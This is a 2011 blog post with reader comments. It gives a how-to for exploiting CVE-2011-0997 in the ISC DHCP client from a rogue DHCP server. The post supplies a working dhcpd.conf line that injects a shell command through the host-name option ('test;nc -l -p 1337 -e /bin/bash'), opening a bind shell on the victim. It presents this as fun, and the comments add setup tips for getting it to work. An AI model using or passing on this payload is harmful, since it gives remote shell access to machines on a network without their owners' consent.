Fun with CVE-2011-0997

Posted on April 12, 2011 by AnarchyAngel

Saw a killer dhcp client bug come across the wire the other day and thought it would be fun to play around with. Heres some info on it:
dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message.
source: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997

This is super easy to exploit, all you need to do is set up a DHCP server and edit the clients hostname to include our payload! Once you get dhcp up and running edit your /etc/dchp3/dhcpd.conf and locate the line that loks something like this:
subnet 10.10.5.0 netmask 255.255.255.0 {
Then right under it add something like this:
option host-name "test;nc -l -p 1337 -e /bin/bash";
Now using the above payload when someone requests an IP from you and its accepted a shell will open on port 1337 on their machine 😀

What happens is the victims computer gets the hostname value from DHCP, then just runs it against the shell. Now because we added a shell metacharacter “;” we are telling the shell that it has multipliable commands to execute which in the above case its the commands to change the hostname to test and “nc -l -p 1337 -e /bin/bash”. Fun right? Ok thats it, peace.

This entry was posted in exploit, hacking, projects, security. Bookmark the permalink.

9 Responses to Fun with CVE-2011-0997

  1. usr says:
    April 16, 2011 at 15:53

    This trick works only when a client does not have hostname entry.

    btw. what distro did you tested?

    Reply
    • AnarchyAngel says:
      April 16, 2011 at 18:16

      Oh crap, good catch on that. Thank you. Yes the victim hes to be setup to get its hostname from DHCP and i tested it on Ubuntu.

      Reply
  2. inode says:
    July 3, 2011 at 17:10

    In what version of ubuntu you tried it?

    I’m working on a 10.10 non patched but the trick it’s not working, can you give me more informations?

    Best regards,

    inode

    Reply
  3. nima says:
    September 25, 2011 at 03:49

    how to setup dhclient to obatin hostname from dhcp server and set it as hostname ?

    Reply
    • AnarchyAngel says:
      September 25, 2011 at 10:43

      add host-name to the list of requests in /etc/dhcp3/dhclient.conf

      Reply
      • nima says:
        September 26, 2011 at 05:51

        tnx 🙂 now it works and get host-name ! but ‘;’ wont escape,my hostname become somthing like this !
        nima@clientname;nc -l -p 4444 -e /bin/bash$
        again tnx for your attention

        Reply
  4. Max says:
    June 7, 2012 at 22:55

    Bit late, I know, but would this trick be able to force open a port for SSH on the time capsule itself? That would be cool, if there was a way.

    Reply

Leave a Reply to Max Cancel reply

Your email address will not be published. Required fields are marked *